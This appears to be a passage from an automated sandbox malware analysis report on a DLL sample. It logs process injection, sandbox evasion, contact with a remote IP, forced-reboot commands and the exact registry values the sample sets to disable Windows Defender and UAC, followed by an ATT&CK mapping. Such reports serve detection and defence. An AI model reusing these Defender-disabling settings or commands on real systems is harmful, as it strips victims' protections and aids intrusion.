Source: C:\Windows\System32\conhost.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,6_2_0040A0E3
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 18022805
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 18022808
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 18022808
Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7888 | Thread sleep time: -18022805s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 2184 | Thread sleep time: -18022808s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 6764 | Thread sleep time: -18022808s >= -30000s
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Windows\System32\loaddll32.exe | Thread delayed: delay time: 120000
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 18022805
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 18022808
Source: C:\Windows\SysWOW64\rundll32.exe | Thread delayed: delay time: 18022808
Source: rundll32.exe, 0000000C.00000002.1326971920.00000000005EA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllR
Source: rundll32.exe, 00000023.00000002.1327887510.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %SystemRoot%\System32\winrnr.dllHyper-V RAW.
Source: rundll32.exe, 00000006.00000002.1326106111.00000000033EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.1329154909.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000013.00000002.1303026422.000000000326A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000023.00000002.1327887510.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exe | Process queried: DebugPort

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 188.166.28.204 80
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 8.8.8.8 53
Source: C:\Windows\SysWOW64\rundll32.exe | Registry value deleted: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender ServiceKeepAlive
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\BJtPlI.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\shutdown.exe shutdown /r /t 0 /f
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe"

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Windows\SysWOW64\rundll32.exe | Code function: RegSetValue: SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA 6_2_0041EE09
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableRoutinelyTakingAction 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableSpecialRunningModes 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender | Registry value created: DisableAntiVirus 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet | Registry value created: DisableBlockAtFirstSeen 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Windows Defender Antivirus\Cloud Delivered Protection | Registry value created: DisableCloudProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | Registry value created: DisableIOAVProtection 1
Source: C:\Windows\SysWOW64\rundll32.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates | Registry value created: ForceUpdateFromMU 0
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
--- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | ---
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 5 Disable or Modify Tools | OS Credential Dumping | 11 Security Software Discovery | Remote Services | Data from Local System | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 211 Process Injection | 31 Virtualization/Sandbox Evasion | LSASS Memory | 31 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Bypass User Account Control | 211 Process Injection | NTDS | 1 System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Rundll32 | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Bypass User Account Control | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
[Behavior graph] Behavior Graph ID: 1634520, Sample: BJtPlI.dll, Startdate: 11/03/2025, Architecture: WINDOWS, Score: 100
Top-level signatures on the graph: Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; Sigma detected: Invoke-Obfuscation CLIP+ Launcher; 3 other signatures
Process tree: loaddll32.exe started rundll32.exe, cmd.exe, rundll32.exe and conhost.exe; the rundll32.exe children (flagged: modifies UAC settings, injects a PE file into foreign processes) started further rundll32.exe instances, cmd.exe and WerFault.exe; the injected rundll32.exe instances (flagged: disables Windows Defender, disables UAC, disables real-time protection, modifies Defender signature update days, system process connects to network) started cmd.exe, which started conhost.exe and shutdown.exe
Network endpoints on the graph: 188.166.28.204 (ports 49708, 49709, 49711; DIGITALOCEAN-ASNUS, Netherlands), 8.8.8.8 (ports 49707, 49710, 49712; GOOGLEUS, United States)

This section contains all screenshots as thumbnails, including those not shown in the slideshow.